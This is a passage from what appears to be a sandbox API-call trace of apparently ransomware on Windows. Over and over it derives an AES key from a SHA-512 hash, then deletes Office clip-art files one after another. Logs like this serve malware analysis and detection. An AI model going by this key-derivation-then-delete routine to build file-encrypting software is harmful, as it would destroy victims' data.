_File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.620] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.620] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0190.620] CryptDestroyHash (hHash=0x9ad538) returned 1 [0190.620] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0190.736] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0190.736] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.736] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad5f8) returned 1 [0190.736] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0190.736] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0190.736] wcslen (_String="\\\\?\\") returned 0x4 [0190.741] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 1 [0190.741] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf")) returned 1 [0190.742] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0190.742] wcslen (_String="OK") returned 0x2 [0190.742] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.742] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0190.742] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0190.742] CryptDestroyHash (hHash=0x9ad738) returned 1 [0190.742] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0190.745] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0190.745] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.745] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad1b8) returned 1 [0190.745] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0190.745] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0190.745] wcslen (_String="\\\\?\\") returned 0x4 [0191.060] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 1 [0191.060] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf")) returned 1 [0191.061] CryptDestroyKey (hKey=0x9ad178) returned 1 [0191.061] wcslen (_String="OK") returned 0x2 [0191.061] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.061] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.062] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0191.062] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0191.062] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0191.064] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44474c | out: phHash=0x1d44474c) returned 1 [0191.064] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.064] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444750 | out: phKey=0x1d444750*=0x9ad638) returned 1 [0191.064] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.064] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.064] wcslen (_String="\\\\?\\") returned 0x4 [0191.173] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 1 [0191.173] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf")) returned 1 [0191.175] CryptDestroyKey (hKey=0x9ad138) returned 1 [0191.175] wcslen (_String="OK") returned 0x2 [0191.175] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.175] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.175] CryptDestroyKey (hKey=0x9ad638) returned 1 [0191.175] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0191.175] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0191.177] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0191.177] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.177] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad7b8) returned 1 [0191.177] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.177] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.177] wcslen (_String="\\\\?\\") returned 0x4 [0191.240] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 1 [0191.241] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf")) returned 1 [0191.242] CryptDestroyKey (hKey=0x9ad438) returned 1 [0191.242] wcslen (_String="OK") returned 0x2 [0191.242] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.242] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.242] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0191.242] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0191.242] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0191.245] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0191.245] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.245] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad338) returned 1 [0191.245] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.245] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.245] wcslen (_String="\\\\?\\") returned 0x4 [0191.327] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 1 [0191.327] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf")) returned 1 [0191.328] CryptDestroyKey (hKey=0x9ad238) returned 1 [0191.328] wcslen (_String="OK") returned 0x2 [0191.328] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.328] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.328] CryptDestroyKey (hKey=0x9ad338) returned 1 [0191.328] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0191.328] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0191.330] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0191.330] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.330] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad338) returned 1 [0191.330] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.330] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.330] wcslen (_String="\\\\?\\") returned 0x4 [0191.344] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 1 [0191.344] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf")) returned 1 [0191.346] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0191.346] wcslen (_String="OK") returned 0x2 [0191.346] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.346] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.346] CryptDestroyKey (hKey=0x9ad338) returned 1 [0191.346] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0191.346] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0191.348] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0191.348] CryptHashData (hHash=0x9ad678, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.348] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad578) returned 1 [0191.348] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.348] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.348] wcslen (_String="\\\\?\\") returned 0x4 [0191.364] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 1 [0191.364] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf")) returned 1 [0191.366] CryptDestroyKey (hKey=0x9ad838) returned 1 [0191.366] wcslen (_String="OK") returned 0x2 [0191.366] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.366] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.366] CryptDestroyKey (hKey=0x9ad578) returned 1 [0191.366] CryptDestroyHash (hHash=0x9ad678) returned 1 [0191.366] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0191.369] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0191.369] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.369] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad5f8) returned 1 [0191.369] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.369] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.369] wcslen (_String="\\\\?\\") returned 0x4 [0191.373] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 1 [0191.373] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf")) returned 1 [0191.374] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0191.374] wcslen (_String="OK") returned 0x2 [0191.374] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.374] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.374] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0191.374] CryptDestroyHash (hHash=0x9ad338) returned 1 [0191.374] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0191.378] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0191.378] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.378] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad238) returned 1 [0191.378] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.378] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.378] wcslen (_String="\\\\?\\") returned 0x4 [0191.391] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 1 [0191.391] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boatinst.wmf")) returned 1 [0191.393] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0191.393] wcslen (_String="OK") returned 0x2 [0191.393] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.393] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.393] CryptDestroyKey (hKey=0x9ad238) returned 1 [0191.393] CryptDestroyHash (hHash=0x9ad138) returned 1 [0191.393] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0191.396] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0191.396] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.396] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad1f8) returned 1 [0191.396] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.396] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.396] wcslen (_String="\\\\?\\") returned 0x4 [0191.441] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 1 [0191.441] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00076_.wmf")) returned 1 [0191.443] CryptDestroyKey (hKey=0x9ad738) returned 1 [0191.443] wcslen (_String="OK") returned 0x2 [0191.443] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.443] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.443] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0191.443] CryptDestroyHash (hHash=0x9ad138) returned 1 [0191.443] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0191.446] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0191.446] CryptHashData (hHash=0x9ad278, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.446] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad178) returned 1 [0191.446] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.446] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.446] wcslen (_String="\\\\?\\") returned 0x4 [0191.456] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 1 [0191.456] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf")) returned 1 [0191.458] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0191.458] wcslen (_String="OK") returned 0x2 [0191.458] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.458] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.458] CryptDestroyKey (hKey=0x9ad178) returned 1 [0191.458] CryptDestroyHash (hHash=0x9ad278) returned 1 [0191.458] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0191.461] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0191.461] CryptHashData (hHash=0x9ad538, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.461] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad538, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad338) returned 1 [0191.461] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.461] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.461] wcslen (_String="\\\\?\\") returned 0x4 [0191.503] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 1 [0191.503] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf")) returned 1 [0191.505] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0191.505] wcslen (_String="OK") returned 0x2 [0191.505] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.505] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.505] CryptDestroyKey (hKey=0x9ad338) returned 1 [0191.505] CryptDestroyHash (hHash=0x9ad538) returned 1 [0191.505] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0191.508] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0191.508] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.508] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad438) returned 1 [0191.508] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.508] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.508] wcslen (_String="\\\\?\\") returned 0x4 [0191.573] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 1 [0191.573] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf")) returned 1 [0191.574] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0191.574] wcslen (_String="OK") returned 0x2 [0191.574] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.574] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.574] CryptDestroyKey (hKey=0x9ad438) returned 1 [0191.574] CryptDestroyHash (hHash=0x9ad178) returned 1 [0191.574] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0191.576] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0191.576] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.577] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad238) returned 1 [0191.577] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.577] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.577] wcslen (_String="\\\\?\\") returned 0x4 [0191.628] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 1 [0191.628] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf")) returned 1 [0191.629] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0191.629] wcslen (_String="OK") returned 0x2 [0191.629] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.629] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.629] CryptDestroyKey (hKey=0x9ad238) returned 1 [0191.629] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0191.629] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0191.631] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0191.631] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.631] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad1b8) returned 1 [0191.631] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.631] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.631] wcslen (_String="\\\\?\\") returned 0x4 [0191.692] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 1 [0191.692] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf")) returned 1 [0191.693] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0191.693] wcslen (_String="OK") returned 0x2 [0191.693] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.693] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.693] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0191.693] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0191.693] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0191.695] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0191.695] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.695] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad438) returned 1 [0191.695] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.695] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.695] wcslen (_String="\\\\?\\") returned 0x4 [0191.704] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 1 [0191.734] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf")) returned 1 [0191.736] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0191.736] wcslen (_String="OK") returned 0x2 [0191.736] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.736] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.736] CryptDestroyKey (hKey=0x9ad438) returned 1 [0191.736] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0191.736] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0191.738] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0191.738] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0191.738] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad8b8) returned 1 [0191.738] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0191.738] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0191.738] wcslen (_String="\\\\?\\") returned 0x4 [0191.754] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 1 [0191.754] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf")) returned 1 [0191.755] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0191.755] wcslen (_String="OK") returned 0x2 [0191.755] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.755] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0191.755] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0191.755] 